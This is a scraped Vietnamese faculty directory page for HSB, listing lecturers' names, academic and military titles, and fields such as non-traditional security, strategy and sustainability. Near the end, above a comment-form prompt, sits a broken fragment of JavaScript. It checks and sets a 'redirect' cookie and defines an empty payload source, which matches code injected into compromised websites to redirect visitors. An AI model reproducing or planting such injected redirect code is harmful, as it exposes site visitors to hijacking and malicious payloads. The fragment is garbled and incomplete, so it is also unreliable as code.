Giảng viên HSB

Ảnh-đại-diện-HSB Với lịch sử đầy tự hào, với thương hiệu dẫn đầu và bản sắc văn hóa riêng, HSB đã thu hút được đông đảo các nhà khoa học và giảng viên xuất sắc đến từ các cơ quan, tổ chức, các trường đại học hàng đầu Việt Nam và thế giới.

 GIẢNG VIÊN 

Kết quả khảo sát cho thấy học viên luôn đánh giá cao tính học thuật, tính thực tiễn và phương pháp giảng dạy hiện đại của các giảng viên HSB. Đây chính là một nét đặc trưng thể hiện chất lượng đào tạo vượt trội của HSB.
Bên cạnh các nhà khoa học và giảng viên cơ hữu, HSB luôn có sự cam kết hợp tác của hơn 100 nhà quản trị xuất sắc trên nhiều lĩnh vực và gần 200 giảng viên ưu tú từ các tổ chức giáo dục có uy tín ở Việt Nam và các nước trên thế giới. 

Danh sách Giảng viên:

4

1

2

GS.TS.Mai Trọng Nhuận

Biến đổi khí hậu và an ninh toàn cầu, phát triển bền vững, an ninh môi trường

Thượng tướng – TS.Nguyễn Văn Hưởng

Đồng tác giả, Giảng viên Chương trình đào tạo Thạc sĩ Quản trị An ninh phi truyền thống

Thượng tướng, Viện sĩ.TS.Nguyễn Huy Hiệu

An ninh truyền thống, An ninh phi truyền thống,

Chiến lược

                      Thay-Khoa ok

                    thay-Phi Anh-dang-web

1

               GS.TS Nguyễn Bách Khoa

 

 

PGS.TS.Hoàng Đình Phi

An ninh phi truyền thống, Chiến lược, Công nghệ, Sáng tạo, Phát triển bền vững

CV giảng viên

GS.TS.Damian Hine

Chiến lược, Công nghệ, Sáng tạo,

Tài sản Trí tuệ, Thương mại hóa

2

PGS.TS-Nguyen-Ngoc-Thang KHoa-Quan-tri-va-Kinh-doanh-HSB

pham hong tung

GS.TS.Andrew Griffiths

Khoa học Quản trị, Khoa học Bền vững,

Chiến lược Quốc tế 

  PGS.TS.Nguyễn Ngọc Thắng 

 Chiến lược công ty, Quản trị nhân sự, Quản trị tri thức, Trách nhiệm xã hội của Doanh nghiệp

CV giảng viên

PGS.TS.Phạm Hồng Tung

Khoa học phát triển, Văn hóa, Lãnh đạo…

CV giảng viên

 Monte Cassim1 

Thay Ca 

Thay-Nguyen-Hoang-Viet 

 GS.TS.Monte Cassim

 Sức khỏe, An ninh Môi trường,

 Khoa học Sự sống

 

           PGS.TS.Trần Ngọc Ca

               PGS.TS.Nguyễn Hoàng Việt

3

j long copy

4

PGS.TS.Vũ Hoàng Ngân

Nguồn nhân lực, chính sách lao động

PGS.TS.Phạm Qúy Long  

Nhân lực, Nhân tài, Văn hóa, Lãnh đạo

CV giảng viên

PGS.TS.Vũ Trí Dũng

Chiến lược, Khoa học Marketing

pgsts-tanvanhoa

PGS-TS-Nguyen-Thi-Ngoc-Hue Khoa-Quan-tri-va-Kinh-doanh-HSB

AMCHAM - BRAD ID PHOTO

Đại tá, PGS.TS.Trần Văn Hòa

Hệ thống thông tin, công nghệ thông tin,

an ninh mạng

CV giảng viên

GS.TS.Nguyễn Thị Ngọc Huệ

An ninh lương thực, kinh tế nông nghiệp,

phát triển bền vững

CV giảng viên

MA. Bradley C.Lalonde

 Former CEO of Citibank Vietnam

Tài chính, ngân hàng, phát triển doanh nghiệp, đầu tư mạo hiểm

CV giảng viên

Untitled-1

tsHoanvantuan

TS-Pham-Van-Hong Khoa-Quan-tri-va-Kinh-doanh-HSB 

Đại tá, TS.Nguyễn Hữu Phúc

Nhà nước và pháp luật, luật pháp và an ninh,

an ninh phi truyền thống 

CV giảng viên

TS.Hoàng Anh Tuấn

Quản trị marketing, quản trị thương hiệu,

an ninh thương hiệu

CV giảng viên

TS.Phạm Văn Hồng

Phát triển DN nhỏ và vừa; Khởi nghiệp;

Quản trị phát triển DN; Marketing và thương hiệu

CV giảng viên_Eng        CV giảng viên_VN

TS-Tran-Huy-Phuong Khoa-Quan-tri-va-Kinh-doanh-HSB

Bich Ngoc 01

foto

TS.Trần Huy Phương

Quản trị sản xuất, quản trị nguồn nhân lực và nhân tài.

CV giảng viên

 TS.Đoàn Đức Tiến

Quản trị sản xuất và hoạt động,

quản trị nhân lực và nhân tài

CV giảng viên

TS.Ngô Vi Dũng 

Khởi nghiệp và Đổi mới sáng tạo, Kinh doanh

quốc tế, Văn hóa doanh nghiệp

CV giảng viên

TSNGUYENTHIKIMOANH 

TS-Vu-Thi-Thao HSB

TS-Nguyen-Quoc-Viet khoa-Quan-tri-va-Kinh-doanh-HSB

TS.Nguyễn Thị Kinh Oanh

Tài chính doanh nghiệp, bảo hiểm,

tái bảo hiểm, quản trị rủi ro

CV giảng viên

 TS.Vũ Thị Thao

An ninh nguồn nước, An ninh môi trường

CV giảng viên

TS.Nguyễn Quốc Việt

Phát triển DN nhỏ và vừa

CV giảng viên

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.